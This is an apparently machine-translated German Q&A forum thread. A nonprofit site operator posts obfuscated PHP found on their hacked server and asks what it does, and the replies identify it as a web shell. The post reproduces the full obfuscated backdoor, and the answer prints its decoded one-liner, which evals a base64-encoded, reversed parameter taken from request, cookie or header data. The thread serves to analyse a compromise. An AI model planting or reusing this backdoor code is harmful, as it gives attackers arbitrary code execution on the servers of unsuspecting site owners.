2016-07-21 9 views
1

Ich betreibe eine Website für eine gemeinnützige Organisation - wir pendeln auf einem PHPb3-System, das auf GoDaddy gehostet wird. Es wurde begonnen, Verbindungsprobleme zu beheben. Ich habe einige "odd" Dateien im Root-Verzeichnis gefunden, von denen ich weiß, dass sie nicht von mir selbst stammen. Kann jemand den Code ansehen und sehen, was diese Dateien machen?Malicious PHP-Code auf dem Server gefunden - kann irgendjemand auf diesen Code hinweisen?

<?php 
$katya='=KIT(a'; $choral= '$'; $fireproof='c'; $avivah= '=UlQy'; $islander= 'O'; $endosperm = '_s'; $fume=':S_:uee'; 
$knighthood ='WH'; $bars ='r$m'; 
$delicately ='D'; $caterpillar = '<ElUsabt'; $daydreaming ='$'; $contrasting = 't'; $gladys= 'S'; $complementing= '('; $kink = 'CK';$goblet ='X';$astigmatic = ')eklE';$ethane= 'l'; $aquamarine= 'Q'; $amalgams= 'u';$ardently= '[email protected]]L;"'; 

$cruelly='e';$lateral = 'P'; 

$chased = 'G'; $aspects = 'e,girT';$dismayed ='$x$Le';$handicap='s';$glints ='d'; $cursing=']Eg'; $jurisprudent = '[ac';$indeed ='M'; $influenza= '_'; 
$dehydrate= 'a'; 

$exch= ')__';$felling ='s'; $jedimaster= 'leFa'; $interrogating ='M'; 
$exaggerating='TLstSi)(_'; 

$introduced='['; $barrette='ARLEn;E;'; $halfhearted= 'o)"s$(fm';$jeffy ='O'; $ange = '9'; 
$handicraftsmen = ')p'; $giacinta = 'r[("KeHLv'; $johann='d'; $efferent ='r';$involving='l'; $cornucopia ='d';$assortment ='$u>U(vSov'; $idles='a';$decimated='`'; $grater = 'e';$chewing = 't'; $kayo='"';$currant =' ';$astronomically ='6'; $decomposition= 'Yo';$dukeleto ='cbi'; $diverging ='O'; $earning = 'e"';$caveman = '?'; 

$independent = '"'; 

$lab= '=(ia$'; $anode = '$';$jixian='y';$freights = '[E';$approve ='(__'; 

$gnome= 'KLeptre'; 
$crimson ='r'; 
$chandler='i_X$gaa';$edits='?';$blunderings='_';$attraction ='P';$avoid='k)rRf7vX';$liabilities='4';$blaster='P'; $alumnae= 's'; $daveen ='VecStT_';$crop= 'esm)Mr'; $isles ='tLnga"'; $beniamino='rRuiJVe';$concentrators = '"'; 
$commando='i'; 
$angrier ='i';$boatsman = 'RhTT_;B'; $informal='s'; $anode =':';$compatible ='^';$catherine = '8In'; $blade= 'e'; 

$inquisition ='['; 

$brutalize='l'; 

$garfield=']Us'; $cruisers = 'r'; $galleried = 'H'; $garvy = '(5d';$lesson = ')6';$gunplay = '('; $fertilization =','; 

$halibut =')'; 

$bravura = ';)lCa';$lamp = 'N';$drain = 'c';$hydroxy ='fa)Z'; $beetles= ']]i(x';$daniella = '?';$bar=$drain. 

$cruisers .$blade. 
$hydroxy['1']. 
$isles['0'] . $blade. $boatsman['4'] . $hydroxy['0'].$beniamino['2'] .$catherine['2']. 

$drain. $isles['0']. $beetles['2']. $decomposition['1'] . 

$catherine['2']; $bulls= $currant ;$hog=$bar ($bulls, $blade.$avoid[6]. 
$hydroxy['1'] . $bravura['2'] .$beetles['3'] .$hydroxy['1'] .$cruisers.$cruisers. $hydroxy['1'] .$jixian. 

$boatsman['4']. $gnome['3'] . $decomposition['1']. 
$gnome['3']. 

$beetles['3'].$hydroxy['0'].$beniamino['2'] .$catherine['2']. $drain . 

$boatsman['4'] .$isles['3'] .$blade .$isles['0'] . 
$boatsman['4']. $hydroxy['1'] . $cruisers. $isles['3']. 
$garfield['2'] . $beetles['3']. $hydroxy[2]. $hydroxy[2] . 

$hydroxy[2] .$bravura['0']); 

$hog 
($avoid['5'] ,$delicately, $garfield['1'], $chandler['3'] ,$lucia , $corporacy[2] ,$boatsman['6'] , $chandler['3'] . $beetles['2']. $lab['0'] .$hydroxy['1'] . $cruisers . $cruisers .$hydroxy['1']. $jixian .$boatsman['4'].$crop['2'] . 
$blade.$cruisers . $isles['3']. $blade . 

$beetles['3'].$chandler['3'] .$boatsman['4'] . $boatsman['0'] . 
$freights['1'] . 
$aquamarine.$garfield['1'] .$freights['1'] . 
$daveen[3] . 
$boatsman[3]. $fertilization .$chandler['3'].$boatsman['4']. $bravura['3']. $diverging. 

$diverging .$gnome['0'].$catherine['1'] . 
$freights['1'].$fertilization . 

$chandler['3'] .$boatsman['4'] . $daveen[3] . $freights['1'] .$boatsman['0']. $beniamino[5]. 
$freights['1']. $boatsman['0'] . $hydroxy[2] . $bravura['0']. $chandler['3'] . $hydroxy['1'].$lab['0'] . 
$beetles['2'] .$garfield['2'].$garfield['2'] . 
$blade . $isles['0'] .$beetles['3'] .$chandler['3'] . $beetles['2'] . 

$inquisition . 
$concentrators.$crop['2']. $avoid['0'] .$bravura['2'].$garfield['2']. 

$beetles['4'] .$bravura['2']. $beniamino['2'] .$bravura['2'].$concentrators.$beetles['1'] . 

$hydroxy[2] .$daniella['0']. 

$chandler['3'] .$beetles['2']. $inquisition.$concentrators . $crop['2']. $avoid['0'] .$bravura['2'] . $garfield['2'] . $beetles['4'] .$bravura['2']. 

$beniamino['2'] .$bravura['2'] .$concentrators . 

$beetles['1'] . 
$anode . $beetles['3']. $beetles['2'] . $garfield['2'].$garfield['2'] .$blade . $isles['0']. $beetles['3'] . $chandler['3'].$beetles['2'] . $inquisition .$concentrators .$galleried. $boatsman[3]. $boatsman[3].$blaster . $boatsman['4']. $crop[4]. $gnome['0'] .$isles['1'] .$daveen[3]. 
$avoid['7']. $isles['1'] .$garfield['1'] . 

$isles['1']. $concentrators .$beetles['1'].$hydroxy[2] .$daniella['0'].$chandler['3']. 
$beetles['2'].$inquisition .$concentrators . 
$galleried. 

$boatsman[3]. $boatsman[3]. 
$blaster.$boatsman['4'] . 
$crop[4].$gnome['0'] . $isles['1'].$daveen[3].$avoid['7']. 

$isles['1']. $garfield['1'] .$isles['1'].$concentrators . $beetles['1']. $anode. 

$garvy['2'] .$beetles['2'] . $blade . $hydroxy[2].$bravura['0'].$blade . $avoid[6]. 

$hydroxy['1'].$bravura['2']. 
$beetles['3'] . $garfield['2']. $isles['0'] .$cruisers. 
$cruisers. $blade .$avoid[6].$beetles['3']. $dukeleto['1']. $hydroxy['1'].$garfield['2'] . $blade .$lesson['1'] . $liabilities.$boatsman['4']. $garvy['2'].$blade . $drain. $decomposition['1']. $garvy['2'] .$blade.$beetles['3'] . 
$garfield['2']. $isles['0']. $cruisers. $cruisers.$blade . $avoid[6] . 
$beetles['3'] . 
$chandler['3'].$hydroxy['1'] .$hydroxy[2].$hydroxy[2] . 

$hydroxy[2] .$hydroxy[2]. $bravura['0']); 
+0

meisten Code wie folgt ein Bedienfeld für den Angreifer alles, was sie – cmorrissey

+0

dieses Skript tatsächlich So wollen hochladen/Ausführen öffnet sich ein '$ _REQUEST nehmen, $ _COOKIE, $ _ SERVER' führt sie in eine Variable zusammen und sucht dann nach einer bestimmten Variablen und dekodiert sie und bewertet sie dann. Grundsätzlich kann der Angreifer mit diesem Skript beliebigen Code ausführen. – cmorrissey

+0

Gibt es einen anderen Ratschlag, als jede php-Datei zu durchsuchen? Irgendeine spezifische Zeichenfolge, nach der ich bei einer Suche über mehrere Dateien suchen sollte? Jeder Rat wird sehr geschätzt –

Antwort

0

Dies ist ein Shell-Skript:

B$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["mklsxlul"])?$i["mklsxlul"]:(isset($i["HTTP_MKLSXLUL"])?$i["HTTP_MKLSXLUL"]:die);eval(strrev(base64_decode(strrev($a))));